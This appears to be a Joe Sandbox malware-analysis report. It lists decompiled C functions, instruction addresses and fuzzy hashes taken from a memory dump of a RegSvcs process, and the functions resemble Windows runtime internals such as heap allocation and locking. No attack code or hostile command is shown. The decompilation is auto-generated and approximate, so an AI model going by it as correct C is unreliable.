						if( *((intOrPtr*)(_t79 + 0xd8)) != 0) {
							_t77 = 0xc000001e;
							L18:
							 *((intOrPtr*)(_t80 - 0x20)) = _t77;
							L19:
							_t64 = 0xffff;
							L14:
							 *((intOrPtr*)(_t80 - 4)) = 0xfffffffe;
							E00FE5520(_t47, _t64, _t79);
							return E0100D0D1(_t77);
						}
						 *((short*)(_t79 + 0xd8)) = _t63;
						 *((char*)(_t80 - 0x1a)) = _t63;
						_t72 =  *0x10a5cb4; // 0x4000
						_t69 = _t79;
						_t77 = E00FE55C8(_t79, (_t72 >> 3) + 2);
						 *((intOrPtr*)(_t80 - 0x20)) = _t77;
						if(_t77 < 0) {
							goto L19;
						}
						E00FE5539(_t79,  *((intOrPtr*)(_t79 + 0xb4)), _t69);
						 *(_t79 + 0xd4) =  *(_t79 + 0xd4) & 0x00000000;
						 *((char*)(_t79 + 0xda)) = 0;
						E00FCEB70(_t79,  *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = 0;
						_t71 = _t79;
						 *(_t80 - 0x24) = E00FE3C3E(_t79);
						E00FCEEF0( *((intOrPtr*)(_t79 + 0xc8)));
						 *((char*)(_t80 - 0x19)) = _t63;
						_t56 =  *(_t80 - 0x24);
						if(_t56 == 0) {
							_t77 = 0xc0000017;
							 *((intOrPtr*)(_t80 - 0x20)) = 0xc0000017;
						} else {
							 *(_t79 + 0xd4) = _t56;
							 *((short*)(_t79 + 0xda)) = 0x202;
							if((E00FE4190() & 0x00010000) == 0) {
								_t58 =  *0x10a5cb4; // 0x4000
								 *(_t79 + 0x6c) = _t58 >> 3;
							}
						}
						_t64 = 0xffff;
						 *((intOrPtr*)(_t79 + 0xd8)) =  *((intOrPtr*)(_t79 + 0xd8)) + 0xffff;
						 *((char*)(_t80 - 0x1a)) = 0;
						 *((char*)(_t80 - 0x19)) = 0;
						_t47 = E00FCEB70(_t71,  *((intOrPtr*)(_t79 + 0xc8)));
						goto L14;
					}
				}
			}

0x00fe53c5
0x00fe53c7
0x00fe53cc
0x00fe53d1
0x00fe53d3
0x00fe53d8
0x00fe53db
0x00fe53de
0x00fe53e1
0x00fe53eb
0x010270b0
0x010270b4
0x00fe540e
0x00fe5410
0x00fe5411
0x00fe5411
0x00fe5415
0x010270ba
0x00000000
0x00fe541b
0x00fe5421
0x00fe5426
0x00fe5432
0x010270d3
0x00fe5438
0x00fe5438
0x00fe5438
0x00fe543c
0x010270de
0x00000000
0x00fe5442
0x00fe5449
0x010270c1
0x010270c6
0x010270c6
0x010270c9
0x010270c9
0x00fe550c
0x00fe550c
0x00fe5513
0x00fe551f
0x00fe551f
0x00fe544f
0x00fe5456
0x00fe5459
0x00fe5465
0x00fe546c
0x00fe546e
0x00fe5473
0x00000000
0x00000000
0x00fe5482
0x00fe5487
0x00fe548e
0x00fe549b
0x00fe54a0
0x00fe54a4
0x00fe54ab
0x00fe54b4
0x00fe54b9
0x00fe54bc
0x00fe54c1
0x010270e2
0x010270e7
0x00fe54c7
0x00fe54c7
0x00fe54cd
0x00fe54e0
0x00fe54e2
0x00fe54ea
0x00fe54ea
0x00fe54e0
0x00fe54ed
0x00fe54f2
0x00fe54f9
0x00fe54fd
0x00fe5507
0x00000000
0x00fe5507
0x00fe543c

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e2394c3452da13f799a8be9cea6a71e8090bfccf1915465a7510821fedc642
Instruction ID: e00bcc1452c5990320b29b0ed04a0d371afef75f4a9da1955c9e1565bfece6c5
Opcode Fuzzy Hash: 20e2394c3452da13f799a8be9cea6a71e8090bfccf1915465a7510821fedc642
Instruction Fuzzy Hash: 4D412630A00795CFDB31DBB888517AFBAE2BF11308F14056EE0C567241DB394908D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FEA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x10a7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x10a7b10 = 8;
					 *0x10a7b14 = 0x10a7b0c;
					 *0x10a7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00FEA990(0x10a7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00FEA840(__edx, __ecx, __ecx, _t52, 0x10a7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x10a7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x10a7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x10a7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00FD4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x10a7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00FFF3E0(_t50,  *0x10a7b14, _t8 >> 3);
						_t28 =  *0x10a7b14; // 0x0
						__eflags = _t28 - 0x10a7b0c;
						if(_t28 != 0x10a7b0c) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x10a7b14 = _t50;
						_t48 = _v12;
						 *0x10a7b10 = _t9;
						goto L6;
					}
					 *0x10a7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x00fea713
0x00fea714
0x00fea717
0x00fea71d
0x00fea720
0x00fea722
0x00fea727
0x00fea74a
0x00fea754
0x00fea75e
0x00fea768
0x00fea76a
0x00fea773
0x00fea78b
0x00fea790
0x00fea792
0x00fea741
0x00fea741
0x00fea743
0x00fea749
0x00fea749
0x00fea732
0x00fea73a
0x00fea797
0x00fea79d
0x00fea7a3
0x00fea7a9
0x00fea7b6
0x00fea7bc
0x00fea7ca
0x00fea7e0
0x00fea7e2
0x00fea7e4
0x01029bf2
0x00000000
0x01029bf2
0x00fea7ed
0x00fea7f2
0x00fea800
0x00fea805
0x00fea80d
0x00fea812
0x01029c08
0x01029c08
0x00fea818
0x00fea81b
0x00fea821
0x00fea824
0x00000000
0x00fea824
0x00fea7ae
0x00000000
0x00fea7ae
0x00fea73c
0x00fea73e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 414b6af5d9e2c98c0162d4763862698be562ecc66376e91f255d47ea46861699
Instruction ID: f0cdf7011f06b423ce45af758731db524c753f6f1174bae1041b3a78ec087922
Opcode Fuzzy Hash: 414b6af5d9e2c98c0162d4763862698be562ecc66376e91f255d47ea46861699
Instruction Fuzzy Hash: 9431D0F26206409FC721CF09DCA0F69B7F9FB84710F948A5AE28587244D37BA901DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FE61A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00FE61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00FE5E50(0xf967cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01089D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00FBF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x00fe61b3
0x00fe61b5
0x00fe61bd
0x00fe61c3
0x00fe61c7
0x00fe61d2
0x00fe61ff
0x00fe61ff
0x00fe6201
0x00fe6207
0x00fe6207
0x00fe61d4
0x00fe61d9
0x00000000
0x00000000
0x00fe61df
0x00fe61e2
0x00000000
0x00000000
0x00fe61e6
0x00fe61e8
0x00fe61ee
0x00fe61ee
0x00fe61f9
0x0102762f
0x01027632
0x01027635
0x01027639
0x01027640
0x0102766e
0x01027675
0x00000000
0x00000000
0x01027681
0x01027689
0x0102768d
0x01027691
0x01027695
0x01027699
0x010276af
0x010276b5
0x010276b7
0x010276b7
0x010276d7
0x010276dc
0x00000000
0x010276dc
0x010276a2
0x010276a9
0x01027651
0x01027653
0x01027653
0x01027656
0x01027656
0x00000000
0x01027656
0x01027644
0x01027646
0x01027648
0x01027648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463c526fd5c3d180faef9ab2caf4120d8762a3375eeb379f1e535c3adbcedb5e
Instruction ID: 08f672f0dab1494584a06b71cba95180d2eebcb1a0959279fd09ea0d1e13bf9b
Opcode Fuzzy Hash: 463c526fd5c3d180faef9ab2caf4120d8762a3375eeb379f1e535c3adbcedb5e
Instruction Fuzzy Hash: 9F317A71A053518FD360CF0AC804B2AB7E5FFA8B10F04496DE998D7251D774E804DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FBAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00FBAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x10ad360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x10a7b9c; // 0x0
					_t53 = L00FD4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00FFB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00FFF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00FC6C59(_t53, _t51, _t58) != 0) {
							_t28 = E00FE5E50(0xf9c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00FEB230(_v32, _v28, 0xf9c2d8, 1,  &_v24);
								_t28 = E00FBF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x00fbaa25
0x00fbaa29
0x00fbaa2d
0x00fbaa30
0x00fbaa37
0x00fbaa3c
0x01014458
0x01014458
0x01014472
0x01014474
0x01014476
0x00fbaa64
0x00fbaa74
0x0101447c
0x01014483
0x01014492
0x00fbaa52
0x00fbaa54
0x00fbaa5e
0x010144a8
0x010144ad
0x010144af
0x010144b6
0x010144b6
0x010144b9
0x010144bc
0x010144cd
0x010144d3
0x010144d6
0x010144e1
0x010144e1
0x010144e6
0x010144e8
0x010144fb
0x010144fb
0x010144e8
0x00000000
0x00fbaa5e
0x01014476
0x00fbaa42
0x00fbaa46
0x00fbaa48
0x00fbaa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fb64495d4c8cff1cb10c94659c534573473478602aac131b515d5142d77f53d
Instruction ID: 5a26e963f6ad2128223a2b007f77497a177d8b56242c56e99bde248619c3be9f
Opcode Fuzzy Hash: 0fb64495d4c8cff1cb10c94659c534573473478602aac131b515d5142d77f53d
Instruction Fuzzy Hash: BA31E872900219EBCF119F69CD42ABFB7B9EF04700B414069F941DB251EB399D10EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF8EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FF8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x10ad360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00FE4E70(0x10a86e4, 0xff9490, 0, 0);
					if( *0x10a53e8 > 5 && E00FF8F33(0x10a53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x10a53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x10a53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xf9bc46;
						_t48 = E01037B9C(0x10a53e8, 0xf9bc46, _t67, 0x10a53e8, _t70,  &_v140);
					}
				}
				return E00FFB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x00ff8ec7
0x00ff8ed9
0x00ff8edc
0x00ff8ee6
0x00ff8ee9
0x00ff8eee
0x00ff8efc
0x00ff8f08
0x01031349
0x01031353
0x0103135d
0x01031366
0x0103136f
0x01031375
0x0103137c
0x01031385
0x01031390
0x01031391
0x0103139c
0x0103139d
0x010313a6
0x010313ac
0x010313b2
0x010313b5
0x010313bc
0x010313bf
0x010313c2
0x010313c5
0x010313c8
0x010313cb
0x010313ce
0x010313d1
0x010313d4
0x010313d7
0x010313da
0x010313dd
0x010313e0
0x010313e3
0x010313e6
0x010313e9
0x010313f6
0x01031400
0x01031400
0x00ff8f08
0x00ff8f32

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb750d7925a8127ab8993f7f696b89ef895d2552748394feb25cf232fa17c787
Instruction ID: 3d76c6f6a5d454211e375e53b623194073ded624d10fde7f3d338a82563c5186
Opcode Fuzzy Hash: eb750d7925a8127ab8993f7f696b89ef895d2552748394feb25cf232fa17c787
Instruction Fuzzy Hash: 2F4181B1D0021CAFDB24CFAAD981AADFBF4FB48710F5081AEE549A7241DB745A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FEE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00FF9670() < 0) {
					E0100DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x10a7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00FD4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00FEE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x00fee730
0x00fee736
0x00fee738
0x00fee73d
0x00fee73e
0x00fee740
0x00fee749
0x00fee765
0x00fee76a
0x00fee76b
0x00fee76c
0x00fee76d
0x00fee76e
0x00fee76f
0x00fee775
0x00fee777
0x00fee77e
0x0102b675
0x00fee784
0x00fee784
0x00fee789
0x00fee7a8
0x00fee7ac
0x00fee807
0x00fee7ae
0x00fee7ae
0x00fee7b1
0x00fee7b4
0x00fee7b9
0x00fee7c0
0x00fee7c4
0x00fee7ca
0x00fee7cc
0x00000000
0x00fee7d3
0x00fee7d6
0x00000000
0x00000000
0x00fee7ff
0x00fee802
0x00000000
0x00000000
0x00fee7f9
0x00fee7fc
0x00000000
0x00000000
0x00fee7f3
0x00fee7f6
0x00000000
0x00000000
0x00fee7ed
0x00fee7f0
0x00000000
0x00000000
0x00fee7e7
0x00fee7ea
0x00000000
0x00000000
0x0102b685
0x0102b688
0x00000000
0x00000000
0x0102b682
0x00000000
0x00000000
0x00fee7cc
0x00fee7d9
0x00fee7dc
0x00fee7de
0x00fee7de
0x00fee7ac
0x00fee7e4
0x00fee74b
0x00fee751
0x00fee759
0x00fee761
0x00fee761

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5933e28cae9fe09634a5401e15e6fb72b204d85168011d8fd4858928e65a22
Instruction ID: 60b14c0df0ce50de6ba7eb614e09e5f8fa76f79186112f09aa97028b8512a66d
Opcode Fuzzy Hash: 6e5933e28cae9fe09634a5401e15e6fb72b204d85168011d8fd4858928e65a22
Instruction Fuzzy Hash: 7731A075A14249EFD704CF59D841F9ABBE4FB09314F14825AFA54CB341D635ED80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FEBC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FEBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x10a6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00FD2280(0xd, 0x533f1a0);
				_t41 =  *0x10a60f8; // 0x0
				if(_t41 != 0) {
					 *0x10a60f8 =  *_t41;
					 *0x10a60fc =  *0x10a60fc + 0xffff;
				}
				E00FCFFB0(_t41, 0x800, 0x533f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x10a60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00FD4620(0x10a6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x10a6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x00febc36
0x00febc42
0x00febc45
0x00febc4a
0x00febd35
0x00000000
0x00000000
0x00000000
0x00000000
0x00febc50
0x00febc50
0x00febc58
0x00febc5a
0x00febc60
0x00000000
0x00000000
0x0102a4f2
0x0102a4f6
0x00000000
0x00000000
0x00000000
0x0102a4fc
0x00febc79
0x00febc7e
0x00febc86
0x00febd16
0x00febd20
0x00febd20
0x00febc8d
0x00febc94
0x00febcbd
0x00febcca
0x00febccb
0x00febccc
0x00febccd
0x00febcce
0x00febcd4
0x00febcea
0x00febcee
0x00febcf2
0x00febd00
0x00febd04
0x00000000
0x00febc96
0x00febcab
0x00febcaf
0x00febd2c
0x00febd2c
0x00febd09
0x00000000
0x00febd09
0x00febcb1
0x00febcb5
0x00febcbb
0x00000000
0x00000000
0x00000000
0x00febcbb

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86c871b10609d99445b5256cfb85a50940fc3cef0e36b1d3b8b168551c3feb44
Instruction ID: cd3eb2c405bddf16a3d0bb787ddd3e6b14c12abab45b51918c4bdaa91508ee7d
Opcode Fuzzy Hash: 86c871b10609d99445b5256cfb85a50940fc3cef0e36b1d3b8b168551c3feb44
Instruction Fuzzy Hash: 39310132A00A969BCB21DF59C880BA773B4FF18310F590079EC85DB205EB3ADD45EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FB9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x108f6e8);
				E0100D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E010888F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0100D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x10a86c0; // 0xb507b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x10a86b8; // 0x0
